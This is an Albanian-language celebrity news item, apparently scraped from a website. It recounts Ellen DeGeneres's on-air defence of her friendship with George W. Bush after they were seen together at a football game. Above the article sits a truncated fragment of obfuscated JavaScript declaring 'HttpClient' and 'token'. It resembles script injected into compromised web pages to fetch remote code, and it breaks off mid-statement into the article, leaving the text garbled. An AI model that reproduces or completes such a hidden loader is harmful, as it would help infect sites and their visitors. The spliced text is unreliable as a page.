;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

U kritikua se ishte parë me një ish-president republikan, ja cfarë ka për të thënë Ellen DeGeneres

By

Ellen DeGeneres po praktikon atë që predikon.

Image result for ellen show

Komediania e famshëme gjithmonë fillon emisionin e saj të përditshëm duke i kërkuar shikuesve të jenë të mire ndaj njëri-tjetrit.

Në emisionin e së Hënës, ylli u kujtoi adhuruesve të saj mesazhin pasi u përball me një reagim të ashpër sepse ishte ulur pranë ish-presidentit George W. Bush në një lojë futbolli në Teksas të Dielën.

Image result for ellen degeneres and george bush

Siç shpjegoi DeGeneres, ajo dhe gruaja e saj Portia De Rossiwere ishin ftuar në lojën Dallas Cowboys dhe Green Bay Packers nga vajza e pronarit të Dallas Cowboys ,Charlotte Jones, ku ishin ulur në një zone VIP.

“Ajo ka miq të famshëm dhe kur e them këtë e kam me të vërtetë të famshëm”, tha ajo.

Image result for ellen degeneres and george bush

Midis atyre miqve të famshëm ishin ish Zonja e Parë Laura Bush dhe burri i saj i famshëm pra ish ish-presidenti George W. Bush, i cili përfundoi pranë DeGeneres. Kur kamerat kapën të dy bashkë në stenda, reagimet e fansave filluan.

Unë isha duke mbështetur Packers kurse të gjithë të tjerët në zonën VIP ishin me Cowboys . Gjatë lojës, ata treguan një skenë të Xhorxhit dhe mua duke qeshur së bashku dhe, kështu, njerëzit ishin të mërzitur. Ata menduan,” Pse është një liberal gay i Hollivudit ulur pranë një presidenti konservator republikan? ”

 

“Unë jam miq me George Bush. Në fakt, unë jam miq me shumë njerëz që nuk ndajnë të njëjtat besime që kam. Ne jemi të gjithë të ndryshëm dhe mendoj se kemi harruar se është mirë që ne të gjithë jemi të ndryshëm, “I  tha ajo audiencës së saj.

 

DeGeneres vazhdoi:

“Kur them të jesh i mirë me njëri-tjetrin, nuk dua të them vetëm njerëzit që mendojnë njësoj si ti. Do të thotë të jesh i mirë me të gjithë – nuk ka rëndësi.”

 

Ndërsa përmbylli mesazhin e saj të përzemërt, DeGeneres falënderoi ish-komandantin e përgjithshëm.

Burimi: Cosmopolitan.com

Artikuj të ngjashëm